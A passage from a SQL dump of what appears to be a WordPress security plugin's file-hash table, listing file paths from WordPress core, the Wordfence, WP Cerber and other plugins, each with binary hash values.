#푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z�׋��%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����t�-��t��K��?','���J��v��7�F)M\'�ѳ��췌ph�]','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�42\Z��!��p<�x�','Tb������FI���j\'!��\'�}A;W','',0,'?'),('l2���SM�/��A��','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�h\r�\"�^i]9)q','E[ٔ��o����9�.��Q�L�\"�������3','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X��s?����˟�g','?`�y�R�ե��`Uʙ��Zdž�f��s��b�sO�','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�;����R!G֟','.ЪnkKBI��7�k�Ed\Zju���\n��x��.','',0,'?'),('l��<��#��q�,�','wp-includes/blocks/archives/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��-O��TT�B�d|P','��q�}���I}n�-�����{]s��N-o�','',0,'?'),('l��14��&y�a��W','wp-includes/css/dist/customize-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%( Zr����f�bPX','z���p�e�{�Fv|�Vl_P5�;Eh<*1ah�','',0,'?'),('m)\r����aH���E�','wp-includes/blocks/social-links/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bzn\n(���9�.Z̜(','r��[O��ʤ�@�H�+�7ǐ�\'�@F�巁�','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('ml��P����û����','wp-content/plugins/wordfence/js/Chart.bundle.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[•=�px	��LE�^�4|��~30yx\Z�&�','',0,'?'),('m�z1�-���&��M','wp-content/themes/newsmagbd/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q��r�\Z��C*','��AV$�II�t�ن{DZ$B>[\'��p�,�','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oͺ�(����+ ]6*','���.6BlN8�K{M�`:Z:���\n��b�vfPh�?','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=�޺��\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LL�#��\0�uD,�Y�i]','�~^���ٴ�	d��i*����W����<6��','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n$���/(D�u�J�k','wp-content/plugins/redirection/actions/pass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[<���uBY�7�\Zlq','XH�a=�{Z�k%�����|8�q~ӂ�6�F\r','',0,'?'),('n?��<}rm\'�eq c','wp-includes/blocks/site-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rgm/��S��&;w',']BkU�J�(�υ�|9���| C��p����,','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nR1�՞��\n�ixBi','���S�⃧��=ȌbjK�����i�$��y�','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('n�{�҄��:�P����','wp-admin/images/about-header-about.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w`LKs{ꇶm%�','))��n��NpiM�O�+�eP�*5�y��j�Xb��','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���-osqƀS�}\\�','���}�!.N����8����*4�IHWt^�!�Ҟz','',0,'?'),('n�|j�por:=U�','wp-content/plugins/redirection/models/url/url-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��e�9���_��S','�VQ0��X��4IM�5.����A\\qNǐ�','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�5���y:	cx2','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⚝q�y���TCg�','xl�:���-�z��AD-j]��2���;/`','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	Ϣ*N��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M� �{����','�[�+G��/�\Z���a���H|Ht�)S����','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('of�Gk�L����`t@','wp-includes/blocks/cover/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�k�t2V4�L�fk�[','�_g��2I��Jթx�f`ptfO\"�_Y��S','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E8��u�ChG<�o܅\"','�TQ��t���ݓ��z�ωT��0��A','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o���O��~3��{��K','wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WsP�m�On�ݚ#J','ʿ����j��\rq���@�v,	S��A`Y�F','',0,'?'),('o�	ǻ�	&��c���','wp-includes/blocks/paragraph/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�o5Ё@��|pp���','$�O�6��p�簙g<EBJ�Tս~i,�����','',0,'?'),('o��u�U-g(<�O�l�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�[[�r���(S','�j�oy��K6�_�0���a0�ud>�,f�','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o⸪e��Z�uv¬','wp-content/plugins/redirection/database/schema/240.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���a���8�J�','!g��{��Z�V.o2��Z�\Z���\n7�s�S','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p�?وU���\0˜','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�}�$c�{G�(�P','��H�M�c�6�v�H�@�EmO2\'5�n�ҬX��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('prY��/�i��?�?��','wp-admin/images/about-header-credits.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZFV��2`$���\\��_{','��4&ڥ���[Nm�4���Čx.\\\Z��','',0,'?'),('pw��Q�F�c�ߠb*','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@$�qG�2k5$��z�','ֆF*`�\'�O t�riR:�j0��W\Z�=�j��','',0,'?'),('p��@�6�}���v��9','wp-content/plugins/wp-cerber/languages/wp-cerber-vi.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Kh=0�yJ8�K9��','�(�I���h/z�rP�M�Ջ���6v6V','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c6q��b2���׍	�','z�.o�D-��\\ׯk{�\"�6�,%\\���#','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�cd�x�W{f��Nb','O��j+hŤ\nⵃ8Qܮ#w��_p�C���','',0,'?'),('pŧ�\n�+R�2Z��b','wp-includes/blocks/post-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S ם�2�	��e|�l','+\'�V���쟽�:���p��D�)=���l��','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_y�OgJ�%g�e���','`�8�J��s�g�UJ���$t����%a�SA>M','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s��	u�c����~���0b����I�&5)','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��*�<�X;��','N5%��=�kUHVK�A�lEI\"3�j��','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@\r\nxt������','�w`\0��:�5��=����`�麯1R)T~�','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���0u�P˚^Xɬ','�a�AԆ\rᔽ�5����No���x\nT9�b7�','',0,'?'),('q%��)���ud���	�','wp-includes/blocks/buttons/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��+���1�n�I�','���	���\0���V~�}G߀v�c��nj�','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��v���S�fa�,k','��G\"J�A=�>�(����s�7*����h��','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��A!�;+��|�M','`�)�_�>�hQHq)��핗��S3.�)Wi','',0,'?'),('q��Z�\0=s�\r��\r�','wp-includes/blocks/text-columns/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�\Z��V��e�','��\r�v)�,�;ӑ��1i2�8X_�{�bل�*','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp+�z�,<�X\nl��B','�{�U�l�,���F�S�=�a<�bd�]�,�{','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ��׈�{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q���}ܟ����f��>C','wp-content/plugins/redirection/redirection-capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9G#�tT�W�����6','@�.p�x�K�iW�\\�N�~�I�����$��','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8œo:?��>�','',0,'?'),('r���\"��%1�}/2Y�','wp-includes/blocks/pullquote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!��P��1��','?掋�|�v`6#jb�1�U~�	?GI�0	w�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('r3\0��=��\r�jB�Z','wp-includes/js/dist/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v)���j����~','0%نC����Q&j�Ial��J#�E����','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	n�{���\0�0U$��','G\n��Ks��I\'��my9\ZV��D\\:�ć�','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V	i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�H�\n�!�!3��ܨ','+r��b���D�V�T�؞|�}���P�ː','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��T_4�O�<�T��','FU���c��G����U��vt����_0]�urq�','',0,'?'),('r����&E��eD�q','wp-includes/blocks/social-links/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2@��	�x]�\n�gG','!�����D&�Ͱ�4��V��Ka,�R��~��]�','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r�jN�mM.s�d���F�','wp-content/plugins/redirection/matches/cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڤ������f�\n�N9�','4��@�~�@�@3�Ŝ�\"�LC�<l�%�*�','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�?2a�1M2Y\r','Կ{��܊��2\n� v����.JD�7�i��','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����9l\nXQ�0h�Q*','�Ź���YZ/����+`�_{�T��n��H�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('sD������I6��|U�_','wp-includes/blocks/post-template/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������I�1*7\'�;�','+��<��\Z�X�e�p�^1J�H��|F�]4','',0,'?'),('sL�Y���C��a�','wp-includes/blocks/embed/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gk��{\\Oz8�RX/,�','�� w�=��Z\"yl�U�=�sR��~�','',0,'?'),('saO�Y�,~r�൭k�','wp-includes/blocks/search/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0Q��_\0d&J�','^\",��[C���h�|�ژ\"��ؠd[�G��b','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�M?o-�8��|�c','ӊ��3�$��P������G�Չ�+�/���	��','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('t	�U� iާ�\"��s�','wp-includes/blocks/buttons/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�o;��&��@\'B','4��b��;-���W�<O	ǻ��,���v)�','',0,'?'),('t�w�\"�[+�T�','wp-content/themes/newsmagbd/vendors/owl.carousel/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڳ�t(+�F\\VI��','��6��d��+��6�n?���U.�G�','',0,'?'),('t�{*��aM��r̎','wp-content/plugins/wp-cerber/assets/flags/tt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp}y����œ�_.�','D�qY\'�?t���}�u���t!��_r^��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t5^	kS(1��z�G^��','wp-includes/blocks/archives/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�R>\"18��34�֩�','f���������C�@%���.��E`J//4','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ch�P����P\rDW','��)� ��$K�8�v3��X&�okv���','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�6����b�X�+M\'','n@���to�:��\\�e!65��,K�V\\=','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('te%����� Y�;��','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�\r���:��-�','��fTr1O@�((m�c)��0���*Љa&�p','',0,'?'),('tm�\n��GO	\'�\Z޵','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('t��